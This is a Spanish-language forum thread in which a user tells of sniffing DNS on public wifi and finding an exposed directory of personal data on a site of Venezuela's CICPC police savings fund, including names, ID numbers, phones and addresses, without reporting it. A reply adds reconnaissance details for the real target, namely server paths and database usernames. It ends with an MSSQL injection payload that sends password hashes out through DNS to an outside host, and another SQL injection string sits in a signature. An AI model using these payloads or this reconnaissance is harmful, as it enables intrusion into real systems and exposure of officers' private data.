send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

"Base de datos" del CICPC

  • 2 Respuestas
  • 1570 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado andergedon

  • *
  • Underc0der
  • Mensajes: 60
  • Actividad:
    0%
  • Reputación 6
  • High tech, low life
    • Ver Perfil
    • GitHub
« en: Noviembre 20, 2016, 04:54:56 pm »
¡Hola de nuevo! Me encontraba esta mañana en un parque, husmeando un poco el trafico de su wifi libre.

Mientras veía las peticiones DNS una me llamó la atención. "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login" el CIPC es "Cuerpo de Investigaciones Científicas, Penales y Criminalísticas" de mi país (Venezuela)
Me pareció extraño que alguien navegue por ese tipo de páginas en una red completamente abierta.

Procedí entonces a buscar y escánear esa página, primero jugué con google un rato hasta que encontré "Index of /txt"


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Lo que me llamó la atención en el sitio eran los .txt y sus nombres. Por ejemplo "AHORROS.txt" y su gran coincidencia con el nombre de la página.

Luego de abrir los archivos, BUM. Información que NO debería ser pública aparece.

Nombres completos, servicios afiliados a la caja de ahorros, disponibilidad de ahorros, deuda del aporte patronal, teléfono, dirección y documento de identidad








He visto antes esto de documentos guardados así por así en otras web. Pero de una de las ramas más importantes del cuerpo policial de Venezuela, no me lo esperaba. Hablamos de miles de líneas de datos personales de detectives/agentes de este cuerpo.
Ahora tengo más razones para quejarme de la ineficiencia de los cuerpos de seguridad en mi país...

Además de toda la información comprometida, hay un log de error muy extenso. No lo logro entender muy bien, no tengo mucha experiencia ahí. Pero los warning al mysql, también despiertan mis alarmas.



Cabe destacar que aún no he reportado nada de todo esto.

\x11\x12\x13

Desconectado kafkam

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: Rmanueld1
« Respuesta #1 en: Enero 31, 2017, 01:40:37 pm »
Soy Venezolano y pues, me entró curiosidad de revisar si de verdad todavía se mantenía esto... Qué te puedo decir, así estamos hermano.

Desconectado 'or '1'=1

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 2
  • 1;if+not(select+s_user)+<>'sa'+waitfor+delay+'1'--
    • Ver Perfil
    • Email
  • Skype: :)
« Respuesta #2 en: Enero 31, 2017, 04:31:04 pm »
Good job, dirbuster can give you that result and search engine dorks; example:





When you login POST response with the next parameters:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login show us the next:

/home/cajadeah/public_html/txt/ PATH DISCLOSURE
'simpadsa'@'localhost'
'cajacicp_bolivar'@'localhost'
'cajacicp_miranda'@'localhost'
 
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ulalah

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  -> login panel
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login wtf

Moar?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  (nothing interesting)...



1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

 

¿Te gustó el post? COMPARTILO!



Base de datos de la upbc LOL

Iniciado por Mentas

Respuestas: 7
Vistas: 2413
Último mensaje Enero 09, 2016, 05:12:35 am
por Mentas
XSS Reflected Error Based "Aerolineas Argentinas"

Iniciado por q3rv0

Respuestas: 3
Vistas: 2319
Último mensaje Septiembre 02, 2012, 04:46:33 pm
por ANTRAX